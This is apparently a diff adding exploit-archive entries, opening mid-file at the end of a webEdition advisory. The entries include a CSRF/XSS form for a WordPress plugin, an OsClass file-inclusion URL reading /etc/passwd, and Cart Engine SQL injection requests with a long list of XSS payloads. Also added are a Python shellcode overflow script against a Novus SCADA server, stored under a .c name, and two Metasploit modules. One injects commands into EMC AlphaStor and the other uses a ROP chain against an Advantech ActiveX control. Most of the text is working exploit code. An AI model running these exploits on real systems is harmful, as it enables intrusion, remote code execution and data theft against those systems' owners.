+Successful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application. 
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to webEdition 6.3.9 Beta
+
+More Information:
+http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23227 - https://www.htbridge.com/advisory/HTB23227 - Path Traversal in webEdition.
+[2] webEdition - http://www.webedition.org - is a Content Management System.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
\ No newline at end of file
diff --git a/platforms/php/webapps/34762.txt b/platforms/php/webapps/34762.txt
new file mode 100755
index 000000000..13222abe2
--- /dev/null
+++ b/platforms/php/webapps/34762.txt
@@ -0,0 +1,52 @@
+Details
+================
+Software: Login Widget With Shortcode
+Version: 3.1.1
+Homepage: http://wordpress.org/plugins/login-sidebar-widget/
+Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
+CVE: Awaiting assignment
+CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
+
+Description
+================
+CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do
+
+Vulnerability
+================
+This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page.  Using that ability they can use JavaScript to control an admin user’s browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.
+
+Proof of concept
+================
+If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript).
+<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=login_widget_afo\">
+  <input type=\"text\" name=\"custom_style_afo\" value=\"&lt;/textarea&gt;<script>alert(1)</script>\">
+  <input type=\"text\" name=\"option\" value=\"login_widget_afo_save_settings\">
+  <input type=\"submit\">
+</form>
+
+Mitigations
+================
+Upgrade to version 3.2.1 or later.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2014-08-26: Discovered
+2014-09-15: Reported to vendor by email
+2014-09-15: Vendor reported the issue fixed and a new version released
+2014-09-17: Published
+
+
+
+Discovered by dxw:
+================
+Tom Adams
+Please visit security.dxw.com for more information.
\ No newline at end of file
diff --git a/platforms/php/webapps/34763.txt b/platforms/php/webapps/34763.txt
new file mode 100755
index 000000000..83bc23c8f
--- /dev/null
+++ b/platforms/php/webapps/34763.txt
@@ -0,0 +1,49 @@
+Information
+-----------
+Advisory by Netsparker.
+Name : LFI Vulnerability in OsClass
+Affected Software : OsClass
+Affected Versions: 3.4.1 and possibly below
+Vendor Homepage : http://osclass.org/
+Vulnerability Type : Local File Inclusion
+Severity : Critical
+CVE-ID: CVE-2014-6308
+Netsparker Advisory Reference : NS-14-031
+
+Advisory URL
+------------
+https://www.netsparker.com/lfi-vulnerability-in-osclass/
+
+Description
+-----------
+Local file inclusion vulnerability where discovered in Osclass, an
+open source project that allows you to create a classifieds sites.
+
+Technical Details
+-----------------
+Proof of Concept URL for LFI in OsClass:
+
+http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
+
+Advisory Timeline
+-----------------
+03/09/2014 - First Contact
+03/09/2014 - Vulnerability fixed:
+https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
+15/09/2014 - Fix released publicly in Osclass 3.4.2
+
+Credits & Authors
+-----------------
+These issues have been discovered by Omar Kurt while testing
+Netsparker Web Application Security Scanner.
+
+About Netsparker
+----------------
+Netsparker can find and report security issues and vulnerabilities
+such as SQL Injection and Cross-site Scripting (XSS) in all websites
+and web applications regardless of the platform and the technology
+they are built on. Netsparker's unique detection and exploitation
+techniques allows it to be dead accurate in reporting hence it's the
+first and the only False Positive Free web application security
+scanner. For more information on Netsparker visit
+https://www.netsparker.com.
\ No newline at end of file
diff --git a/platforms/php/webapps/34764.txt b/platforms/php/webapps/34764.txt
new file mode 100755
index 000000000..5af030da5
--- /dev/null
+++ b/platforms/php/webapps/34764.txt
@@ -0,0 +1,249 @@
+=== Details ===
+Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
+Affected Product: Cart Engine
+Version: 3.0
+
+=== Executive Summary ===
+
+SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
+a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
+of cart.php page. Successful exploitation of the vulnerabilities results in read
+sensitive data from the database and, in some cases, execute administration
+operation on the database or issue commands to the operating system.
+
+Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
+a lack in the neutralization[2] of multiple pages output which includes the user
+submitted content. Successful exploitation of the vulnerabilities, results in
+the execution of arbitrary HTML and script code in the user’s browser in the context of
+the victim user's session trough a “Reflected XSS”.
+
+Open Redirect: Using a specially crafted HTTP request, it is possible to
+redirect[3] the normal browsing of users to a malicious site by modifying
+untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
+msg.php and page.php pages. Successful exploitation of the vulnerabilities
+results in phishing scam, user credential theft, malware dissemination.
+
+=== Proof of Concept ===
+
+= SQL Injection (based on MySQL) =
+
+A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
+CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id”
+parameter, so error based and boolean-based blind or time-based blind SQL
+Injection attacks can be executed.
+
+
+## HTTP REQUEST - injection on item_id[0] parameter ##
+POST /cart.php HTTP/1.1
+Host: eshop.hacme.hac
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://eshop.hacme.hac/detail.php?item_id=8
+Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
+Content-Length: 774
+
+-----------------------------109606523931762158449252347
+Content-Disposition: form-data; name="AXSRF_token"
+
+
+-----------------------------109606523931762158449252347
+Content-Disposition: form-data; name="cmd"
+
+add
+-----------------------------109606523931762158449252347
+Content-Disposition: form-data; name="item_id[0]"
+
+8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
+-----------------------------109606523931762158449252347
+Content-Disposition: form-data; name="qty[0]"
+
+1
+-----------------------------109606523931762158449252347
+Content-Disposition: form-data; name="qty[0]"
+
+1
+-----------------------------109606523931762158449252347--
+## EOF HTTP REQUEST ##
+
+## HTTP REQUEST - injection on item_id[] parameter ##
+POST /cart.php HTTP/1.1
+Host: eshop.hacme.hac
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://eshop.hacme.hac/detail.php?item_id=13
+Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
+Content-Length: 2353
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="AXSRF_token"
+
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="cmd"
+
+add
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="item_id[0]"
+
+13
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[0]"
+
+1
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[0]"
+
+1
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="prod_opt_3"
+
+3
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="prod_opt_12"
+
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="item_id[]"
+
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[]"
+
+1
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="item_id[]"
+
+' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[]"
+
+1
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="item_id[]"
+
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[]"
+
+1
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="item_id[]"
+
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[]"
+
+1
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="item_id[]"
+
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[]"
+
+1
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="item_id[]"
+
+
+-----------------------------1948855485207142787318084006
+Content-Disposition: form-data; name="qty[]"
+
+1
+-----------------------------1948855485207142787318084006--
+## EOF HTTP REQUEST ##
+
+= Reflected XSS =
+
+A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
+CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
+"drop down TOP menu (with path)" and the parameter "$print_this_page" in section
+"footer_content_block" are not sanitized, so an XSS attack can be executed on
+multiple pages.
+
+## HTTP REQUESTS ##
+/index.php?"><script>alert('XSS')<%2fscript>
+/index.php?'%3balert('XSS')%2f%2f
+/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
+/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
+/contact.php?"><script>alert('XSS')<%2fscript>
+/contact.php?'%3balert('XSS')%2f%2f
+/detail.php?item_id=10&'%3balert('XSS')%2f%2f
+/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
+/distro.php?'%3balert('XSS')%2f%2f
+/distro.php?"><script>alert('XSS')<%2fscript>
+/newsletter.php?'%3balert('XSS')%2f%2f
+/newsletter.php?"><script>alert('XSS')<%2fscript>
+/page.php?pid=2&"><script>alert('XSS')<%2fscript>
+/page.php?pid=2&'%3balert('XSS')%2f%2f
+/profile.php?"><script>alert('XSS')<%2fscript>
+/profile.php?'%3balert('XSS')%2f%2f
+/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
+/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
+/sitemap.php?'%3balert('XSS')%2f%2f
+/sitemap.php?"><script>alert('XSS')<%2fscript>
+/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
+/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
+/tell.php?'%3balert('XSS')%2f%2f
+/tell.php?"><script>alert('XSS')<%2fscript>
+## EOF HTTP REQUEST ##
+
+= Open Redirect =
+
+An Open Redirect vulnerability has been detected on multiple pages in Cart
+Engine CMS. The function "redir" in file "includes/function.php" doesn't check
+the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
+executed.
+
+## HTTP REQUEST ##
+GET /page.php HTTP/1.1
+Host: eshop.hacme.hac
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://www.google.com/search?hl=en&q=
+Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
+Connection: close
+
+
+$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
+hacme.hac [10.0.2.80] 80 (http) open
+HTTP/1.1 302 Found
+Date: Sun, 10 Aug 2014 15:16:34 GMT
+Server: Apache/2.2.15 (CentOS)
+X-Powered-By: PHP/5.3.3
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: http://www.google.com/search?hl=en&q=
+Content-Length: 0
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+ sent 403, rcvd 380
+
+=== Solution ===
+
+Upgrade to Cart Engine 4.0.
+
+=== Disclosure Timeline ===
+
+2014-08-08 – Vulnerability Discovered
+2014-08-10 – Initial vendor notification
+2014-08-20 – The vendor fixed the vulnerability
+2014-09-15 – Public advisory
+
+=== References ===
+
+[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
+[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
+[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
\ No newline at end of file
diff --git a/platforms/windows/dos/34752.c b/platforms/windows/dos/34752.c
new file mode 100755
index 000000000..c6c71a0ea
--- /dev/null
+++ b/platforms/windows/dos/34752.c
@@ -0,0 +1,49 @@
+## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC
+## Date: 09/23/2014
+## Author: Pedro Sánchez
+## Version: 1.83 (English)
+## Tested on: Windows 7 embedded. 
+
+## Notified the vendor, vendor never responded.
+## In the new version this PoC stops working
+ 
+## Vendor: Novus 
+## http://www.novus.com.br
+ 
+## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation 
+ 
+import os
+import socket
+import sys
+
+## The process listens on TCP port 2001
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+ 
+print " PoC WS10 Data Server SCADA Exploit "
+print " Pedro Sanchez "
+ 
+shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90") 
+ 
+## Exploit contructor
+
+	ws10 = ("\x90" * 1024 + "\x44" * 31788) 
+	ws10 += ("\xeb\x14") 
+	ws10 += ("\x44" * 6) 
+	ws10 += ("\xad\xbb\xc3\x77") 
+	ws10 += ("\xb4\x73\xed\x77")  
+	ws10 += ("\x90" * 21) 
+	ws10 += shellcode
+
+ 
+print "  [+] Sending payload..."
+ 
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
+s.connect((host,port)) 
+s.send(ws10)  
+data = s.recv(1024)
+ 
+print "  [+] Closing..."
+s.close()  
+print "  [+] Done!"
\ No newline at end of file
diff --git a/platforms/windows/remote/34756.rb b/platforms/windows/remote/34756.rb
new file mode 100755
index 000000000..96f5e86e9
--- /dev/null
+++ b/platforms/windows/remote/34756.rb
@@ -0,0 +1,121 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
+      'Description'     => %q{
+        This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
+        command, the process does not properly filter user supplied input allowing for arbitrary
+        command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
+        with Windows 2003 SP2 and Windows 2008 R2.
+      },
+      'Author'          =>
+        [
+          'Anyway <Aniway.Anyway[at]gmail.com>',               # Vulnerability Discovery
+          'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
+          'Mohsan Farid <faridms[at]gmail.com>',               # msf module
+          'Brent Morris <inkrypto[at]gmail.com>',              # msf module
+          'juan vazquez'                                       # convert aux module into exploit
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2013-0928'],
+          ['ZDI', '13-033']
+        ],
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X86,
+      'Payload'         =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Targets'  =>
+          [
+            [ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
+          ],
+      'CmdStagerFlavor' => 'vbs',
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => 'Jan 18 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(3000)
+      ], self.class )
+  end
+
+  def check
+    packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
+    res = send_packet(packet)
+    if res && res =~ /Could not fork command/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    execute_cmdstager({ :linemax => 487 })
+  end
+
+  def execute_command(cmd, opts)
+    padding = rand_text_alpha_upper(489 - cmd.length)
+    packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
+    connect
+    sock.put(packet)
+    begin
+      sock.get_once
+    rescue EOFError
+      fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
+    end
+    disconnect
+  end
+
+  def execute_cmdstager_begin(opts)
+    if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
+      cmd_list.each do |cmd|
+        cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
+      end
+    end
+  end
+
+  def send_packet(packet)
+    connect
+
+    sock.put(packet)
+    begin
+      meta_data = sock.get_once(8)
+    rescue EOFError
+      meta_data = nil
+    end
+
+    unless meta_data
+      disconnect
+      return nil
+    end
+
+    code, length = meta_data.unpack("N*")
+
+    unless code == 1
+      disconnect
+      return nil
+    end
+
+    begin
+      data = sock.get_once(length)
+    rescue EOFError
+      data = nil
+    ensure
+      disconnect
+    end
+
+    data
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/remote/34757.rb b/platforms/windows/remote/34757.rb
new file mode 100755
index 000000000..dbc58081c
--- /dev/null
+++ b/platforms/windows/remote/34757.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
+      'Description'         => %q{
+        This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
+        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
+        sprintf can be reached with user controlled data through the GetColor function.
+        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
+        7 SP1 with IE8 and IE 9.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Unknown', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2014-2364'],
+          ['ZDI', '14-255'],
+          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
+        ],
+      'DefaultOptions'      =>
+        {
+          'Retries'              => false,
+          'InitialAutoRunScript' => 'migrate -f'
+        },
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => /MSIE/i,
+          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
+          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
+          :method  => "GetColor"
+        },
+      'Payload'             =>
+        {
+          'Space'           => 1024,
+          'DisableNops'     => true,
+          'BadChars'        => "\x00\x0a\x0d\x5c",
+          # Patch the stack to execute the decoder...
+          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
+          # Fix the stack again, this time better :), before the payload
+          # is executed.
+          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+                               "\x83\xC0\x08"             + # add eax, byte 8
+                               "\x8b\x20"                 + # mov esp, [eax]
+                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
+        },
+      'Platform'            => 'win',
+      'Arch'                => ARCH_X86,
+      'Targets'             =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'       => 0,
+      'DisclosureDate'      => 'Jul 17 2014'))
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Requested: #{request.uri}")
+
+    content = <<-EOS
+<html>
+<head>
+<meta http-equiv="cache-control" content="max-age=0" />
+<meta http-equiv="cache-control" content="no-cache" />
+<meta http-equiv="expires" content="0" />
+<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
+<meta http-equiv="pragma" content="no-cache" />
+</head>
+<body>
+<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
+<script language='javascript'>
+test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
+</script>
+</body>
+</html>
+    EOS
+
+    print_status("Sending #{self.name}")
+    send_response_html(cli, content, {'Pragma' => 'no-cache'})
+  end
+
+  # Uses gadgets from ijl11.dll 1.1.2.16
+  def rop_payload(code)
+    xpl = rand_text_alphanumeric(61) # offset
+    xpl << [0x60014185].pack("V")    # RET
+    xpl << rand_text_alphanumeric(8)
+
+    # EBX = dwSize (0x40)
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << [0x9ffdafc9].pack("V") # eax value
+    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
+    xpl << [0x60018084].pack("V") # POP EBP # RETN
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
+    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
+    # EDX = flAllocationType (0x1000)
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << [0x9ffdbf89].pack("V") # eax value
+    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
+    # ECX = flProtect (0x40)
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    0x41.times do
+      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
+    end
+    # EAX = ptr to &VirtualAlloc()
+    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
+    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
+    # EBP = POP (skip 4 bytes)
+    xpl << [0x6002054b].pack("V") # POP EBP # RETN
+    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
+    # ESI = ptr to JMP [EAX]
+    xpl << [0x600181cc].pack("V") # POP ESI # RETN
+    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
+    # EDI = ROP NOP (RETN)
+    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
+    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
+    # ESP = lpAddress (automatic)
+    # PUSHAD # RETN
+    xpl << [0x60018399].pack("V") # PUSHAD # RETN
+    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
+    xpl << code
+
+    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
+    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
+
+    xpl
+  end
+
+end
\ No newline at end of file